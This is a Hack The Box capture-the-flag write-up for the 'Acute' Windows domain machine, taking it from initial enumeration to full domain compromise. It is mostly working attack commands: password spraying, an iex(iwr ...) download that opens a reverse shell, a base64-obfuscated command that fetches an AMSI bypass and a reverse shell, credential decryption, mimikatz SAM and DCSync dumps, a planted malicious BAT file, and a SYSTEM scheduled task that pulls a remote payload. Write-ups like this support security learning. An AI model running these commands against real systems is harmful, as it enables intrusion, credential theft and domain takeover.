HTB Writeup: Acute

Hopping between jails, pivoting our way…

Enumeration

nmap

Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-04 07:55 IST
Nmap scan report for 10.129.136.40 (10.129.136.40)
Host is up (0.080s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT    STATE SERVICE  VERSION
443/tcp open  ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=atsserver.acute.local
| Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver
| Not valid before: 2022-01-06T06:34:58
|_Not valid after:  2030-01-04T06:34:58
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: 2022-07-04T02:43:16+00:00; +15m23s from scanner time.
| tls-alpn:
|_  http/1.1
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 15m22s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 133.00 seconds
  1. A web server at TCP/443 is detected.
  2. On browsing through the website, a document is found at https://atsserver.acute.local/New_Starter_CheckList_v7.docx (on About Page)

Document

  1. The document is an Induction Checklist for New Starters. It is a standard set of schedule to follow while onboarding new employees.

    Untitled

  2. Under the details for the activity IT Overview, it is mentioned that some users don’t change the default password Password1!.

  3. The document also points to a remote training link: https://atsserver.acute.local/Acute_Staff_Access

  4. The link redirects to a Windows PowerShell Web Access Console.

    Untitled

  5. The metadata of document shows the origin computer : Acute-PC01

    Untitled

Initial Access

  1. 3 variables are required by PSWA to authenticate to a valid powershell session on a computer in the network.

  2. Password is found in the document. Computer Name from the metadata of the document. Only a valid username is unknown.

  3. From the user that created the document, the company uses the <FIRST LETTER OF FIRSTNAME><Last Name> as policy for creating usernames.

  4. A list of employees is available on the About page on the website.

    Untitled

  5. A list of usernames is created using this information:

    Aileen Wallace
    Charlotte Hall
    Evan Davies
    Ieuan Monks
    Joshua Morgan
    Lois Hopkins
    AWallace
    CHall
    EDavies
    IMonks
    JMorgan
    LHopkins
    Aileen
    Charlotte
    Evan
    Ieuan
    Joshua
    Lois
    
  6. After fuzzing/bruteforcing the Acute\<Username>:Password1! credentials to connect to Acute-PC01, a valid set of credentials is found. Acute\EDavies:Password1!

    Untitled

User Access

  1. With privileges of EDavies, a winPeas enumeration is performed.

  2. A user writeable path that is under AV Exclusions is listed. C:\Utils

    Untitled

  3. Querying for active RDP sessions using query user on PSWA session, it is found that the user edavies has a active console session. The output for that session can be captured using meterpreter session.

    Untitled

  4. The user Acute\EDavies, is found to be using credentials of Acute\IMonks to execute commands on ATSSERVER, which is the Domain Controller for the domain ACUTE.LOCAL using configuration dc_manage. (As also mentioned in the word document). The credentials are: Acute\IMonks:W3_4R3_th3_f0rce.

  5. A command execution is achieved using these credentials and configuration dc_session.

    $username = "Acute\imonks"
    $password = ConvertTo-SecureString -AsPlainText -Force "W3_4R3_th3_f0rce."
    $credentials = New-Object System.Management.Automation.PSCredential($username, $password)
       
    Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $credential -ScriptBlock {whoami}
    
  6. The PSWA doesn’t allow to execute commands in such manner due to issues of hopping. This can be bypassed by using Invoke-ReverseShellTcp.ps1 and getting a raw reverse powershell session.

    iex(iwr http://my.ip.addr.ess/Invoke-PowerShellTcp.ps1 -usebasicparsing);Invoke-PowershellTcp -Reverse -IPAddress my.ip.addr.ess -Port ListnerPort
    

    Untitled

    Untitled

  7. The remote Powershell Session configuration dc_manage is limited in capabilities. This can be analogous to Shell Jail.

    Untitled

Privilege Escalation

Escaping Powershell Jail

  1. The powershell jail has following commands available for the user Acute\imonks:

    1. Get-Alias
    2. **Get-ChildItem** (ls for directories)
    3. Get-Command
    4. Get-Content (Reads content from a file)
    5. Get-Location
    6. Set-Content (Write into a new file or overwrite existing)
    7. Set-Location
    8. Write-Output
  2. Apart from these, basic aliases also work ls, cat, cd

  3. Enumerating further, a powershell script is found in the Desktop Folder for the user imonks. Contents of the powershell script:

    Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $credentials -ScriptBlock {cat C:\Users\imonks\Desktop\wm.ps1}
    $securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
    $passwd = $securepasswd | ConvertTo-SecureString
    $creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
    Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds
    
  4. This powershell script is using credentials for Acute\jmorgan to execute commands on Acute-PC01. The user Acute\jmorgan is a member of the Local Administrators group on Acute-PC01.

  5. We can modify the script using Set-Content command available to imonks

  6. The password in the script is a SecureString format of password, which then can be converted to EncryptedString to be used for creating a PSCredential object to be used with various commands.

  7. This post from StackOverflow describes how to convert such SecureStrings into plain text password. The condition is, the secure strings cannot be converted into plaintext password on any other machine. By setting the contents of wm.ps1 to following, the Plain-Text password can be achieved.

    $securepasswd = "01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51" ; $passwd = $securepasswd | ConvertTo-SecureString ; $creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd) ; $Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($passwd) ; $result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr); [System.Runtime.InteropServices.Marshal]::ZeroFreeCoTaskMemUnicode($Ptr) ; $result
    
  8. The password can be recovered following commands in order:

    Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock{Set-Content C:\Users\imonks\Desktop\wm.ps1 '$securepasswd = "01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51" ; $passwd = $securepasswd | ConvertTo-SecureString ; $creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd) ; $Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($passwd) ; $result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr); [System.Runtime.InteropServices.Marshal]::ZeroFreeCoTaskMemUnicode($Ptr) ; $result'}
       
    Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock{C:\Users\imonks\Desktop\wm.ps1}
    # !T5_0nly_y4_{f4c3}
       
    

    Untitled

  9. Credentials for Acute\jmorgan are obtained. Acute\jmorgan:!T5_0nly_y4_{f4c3}

  10. The commands can be executed on Acute-PC01 using the same method of Invoke-Command with PSCredential Object and ComputeName as Acute-PC01.

    $username = "Acute\jmorgan"
    $password = ConvertTo-SecureString -AsPlainText -Force "!T5_0nly_y4_{f4c3}"
    $credential = New-Object System.Management.Automation.PSCredential($username, $password)
    Invoke-Command -ComputerName Acute-PC01 -Credential $credential -ScriptBlock {whoami}
    

    Untitled

  11. The user Edavies can be now added to Local Administrator Group on Acute-PC01 to escalate session and dump SAM hashes from the machine.

    net.exe localgroup Administrators Acute\edavies /add
    

    Untitled

  12. Apart from this, a full powershell session can also be achieved for the user imonks on ATSServer which can be useful for Active Directory and Basic Enumeration. This can be done by setting the content of wm.ps1 as following:

    powershell -ep bypass -enc aQBlAHgAKABpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAxADoANwAwADcAMAAvAGEAbQBzAGkALQBiAHkAcABhAHMAcwAuAHAAcwAxACAALQB1AHMAZQBiAGEAcwBpAGMAcABhAHIAcwBpAG4AZwApADsAIABpAGUAeAAoAGkAdwByACAAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQALgAyADEAOgA3ADAANwAwAC8ASQBuAHYAbwBrAGUALQBQAG8AdwBlAHIAUwBoAGUAbABsAFQAYwBwAC4AcABzADEAIAAtAHUAcwBlAGIAYQBzAGkAYwBwAGEAcgBzAGkAbgBnACkAOwAgAEkAbgB2AG8AawBlAC0AUABvAHcAZQByAFMAaABlAGwAbABUAGMAcAAgAC0AUgBlAHYAZQByAHMAZQAgAC0ASQBQAEEAZABkAHIAZQBzAHMAIAAxADAALgAxADAALgAxADQALgAyADEAIAAtAFAAbwByAHQAIAA5ADAAOQAwAA==
        
    # iex(iwr http://my-web-server.local/amsi-bypass.ps1 -usebasicparsing); iex(iwr http://my-web-server.local/Invoke-PowerShellTcp.ps1 -usebasicparsing); Invoke-PowerShellTcp -Reverse -IPAddress local-machine -Port 9090
    
  13. Following commands will spawn an unrestricted reverse powershell.

    $username = "Acute\imonks"
    $password = ConvertTo-SecureString -AsPlainText -Force "W3_4R3_th3_f0rce."
    $credentials = New-Object System.Management.Automation.PSCredential($username, $password)
        
    Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -ScriptBlock {Set-Content C:\Users\imonks\Desktop\wm.ps1 'powershell -ep bypass -enc aQBlAHgAKABpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAxADoANwAwADcAMAAvAGEAbQBzAGkALQBiAHkAcABhAHMAcwAuAHAAcwAxACAALQB1AHMAZQBiAGEAcwBpAGMAcABhAHIAcwBpAG4AZwApADsAIABpAGUAeAAoAGkAdwByACAAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQALgAyADEAOgA3ADAANwAwAC8ASQBuAHYAbwBrAGUALQBQAG8AdwBlAHIAUwBoAGUAbABsAFQAYwBwAC4AcABzADEAIAAtAHUAcwBlAGIAYQBzAGkAYwBwAGEAcgBzAGkAbgBnACkAOwAgAEkAbgB2AG8AawBlAC0AUABvAHcAZQByAFMAaABlAGwAbABUAGMAcAAgAC0AUgBlAHYAZQByAHMAZQAgAC0ASQBQAEEAZABkAHIAZQBzAHMAIAAxADAALgAxADAALgAxADQALgAyADEAIAAtAFAAbwByAHQAIAA5ADAAOQAwAA=='} -Credential $credentials
        
    Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock{C:\Users\imonks\Desktop\wm.ps1}
        
    

    Untitled

Dumping SAM Hashes and Password Spray

  1. After adding Acute\EDavies to the Administrators group, the session has to be relaunched for new privileges to take effect.

  2. After the relaunch, privileges can be checked by using whoami /priv command.

    Untitled

  3. Mimikatz can be then downloaded into the excluded directory C:\Utils and executed for dumping SAM hashes.

    .\mimikatz.exe "token::elevate" "lsadump::sam" "exit" | Out-File -FilePath .\SAMDump.txt -Encoding utf8
    

    Untitled

    Untitled

  4. The NTLM hash for the user Administrator was cracked using hashcat.

    .\hashcat.exe -m 1000 -a 0 -O Y:\Documents\HTB\Acute\samhash.hash G:\Wordlists\rockyou.txt
       
    # a29f7623fd11550def0192de9246f46b:[email protected]
    
  5. This password can be tried to spray against remaining users on ATSSERVER:

    1. Acute\AWallace
    2. Acute\CHall
    3. Acute\LHopkins
  6. The password worked with Acute\AWallace account.

    $username = "Acute\AWallace"
    $password = ConvertTo-SecureString -AsPlainText -Force "[email protected]"
    $credential = New-Object System.Management.Automation.PSCredential($username, $password)
       
    Invoke-Command -ComputerName ATSSERVER -Credential $credential -Configuration dc_manage -ScriptBlock {whoami}
       
    

    Untitled

Active Directory Enumeration and Looking Around on Domain Controller

  1. Going back to unrestricted powershell session of imonks, it can be leveraged to perform AD Enumeration and Windows Enumeration using BloodHound, winpeas, and PowerView.ps1.

  2. On quick enumeration and AD mapping using Bloodhound, it is found that domain group Site_Admin is a member of Domain Admins Group. SID: S-1-5-21-1786406921-1914792807-2072761762-2102

  3. The footer of the Word Document says the following:

    **Lois is the only authorized personnel to change Group Membership, Contact Lois to have this approved and changed if required. Only Lois can become site admin. **

  4. According to this, the user Acute\LHopkins has permissions to add members to domain group. This can be confirmed by checking ACLs that Acute\LHopkins hold on Domain Objects.

    # From PowerView.ps1
    # LHopkins SID : S-1-5-21-1786406921-1914792807-2072761762-1109
    # Site_Admin SID : S-1-5-21-1786406921-1914792807-2072761762-2102
       
    Get-DomainObjectACL -resolveGuids | ?{$_.ObjectSID -like "<Site_admin SID>"} | ?{$_.SecurityIdentifier -like "<LHopkins SID>"}
    

    Untitled

  5. This confirms that Acute\LHopkins has GenericAll DACL that can allow the user full control on the domain object, which is the Site_Admin group here.

  6. On further enumeration, an odd folder is found in C:\Program Files folder, named keepmeon. “Keep Me On”. The user Acute\imonks doesn’t have permission to see the contents of the folder C:\Program Files\keepmeon

    Untitled

  7. But the user Acute\AWallace has permissions for the same operation.

    Untitled

  8. There’s a single BAT in the directory. The content of the BAT files are:

    REM This is run every 5 minutes. For Lois use ONLY
    @echo off
     for /R %%x in (*.bat) do (
     if not "%%x" == "%~0" call "%%x"
    )
    
  9. The bat file runs any .bat files present in the same folder, and it is run by Lhopkins user every 5 minutes. This is a perfect place to drop a malicious BAT file and add one of the earlier compromised user in Site_Admin group.

net.exe group Site_admin "edavies" /add /domain # To attack from Acute-PC01
net.exe group Site_admin "imonks" /add /domain # To attack on Domain Controller

Exploitation

  1. The exploit can be achieved using following commands:

    $username = "Acute\AWallace"
    $password = ConvertTo-SecureString -AsPlainText -Force "[email protected]"
    $credential = New-Object System.Management.Automation.PSCredential($username, $password)
       
    Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $credential -ScriptBlock {Set-Content "C:\Program Files\keepmeon\actual_update00.bat" 'net.exe group Site_admin "edavies" /add /domain'}
       
    Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $credential -ScriptBlock {Set-Content "C:\Program Files\keepmeon\actual_update01.bat" 'net.exe group Site_admin "imonks" /add /domain'}
       
    
  2. After placing files, the execution might happen immediately or in a few minutes since that depends on the time of last execution. It executes every five minutes.

  3. On execution, the member is/are successfully added to the Site_Admin domain group.

    Untitled

  4. The members of Domain Admins group can now perform DCSync attacks using either mimikatz.exe or Invoke-Mimikatz,ps1

    Invoke-Mimikatz -Command '"lsadump::dcsync /patch /all /domain:acute.local" "exit"' | Out-File -FilePath dcsync.txt
    

    Untitled

  5. To escalate privileges to NT Authority\System, a task can be scheduled and run on the domain controler..

    schtasks /create /S atsserver.acute.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (iwr http://dropzone.local/amsi-bypass.ps1 -usebasicparsing); iex (iwr http://dropzone.local/Invoke-PowerShellTcp.ps1 -usebasicparsing); Invoke-PowerShellTcp -Reverse -IpAddress 10.10.14.21 -Port 9092'"
    schtasks /Run /S atsserver.acute.local /TN "STCheck"
    

    Untitled

The remote domain is now completely compromised.

Avatar
Mayank Malik
CRTP | Incident Responder | Synack Red Team Member | Threat Analyst | Security Researcher | Cloud/Network Architect

Mayank Malik is a tech savvy person, Red Team Enthusiast, and likes to wander around to learn new stuff. Cryptography, Networking and System Administrations are his forte. He’s one of the Founding Members for CTF Team, Abs0lut3Pwn4g3, and Core Member at DC 91120 (DEFCON Community Group). Apart from the mentioned skills, he’s good at communication skills and is goal oriented person. Yellow belt holder at pwn.college in pursue of learning and achieving Blue Belt.

Related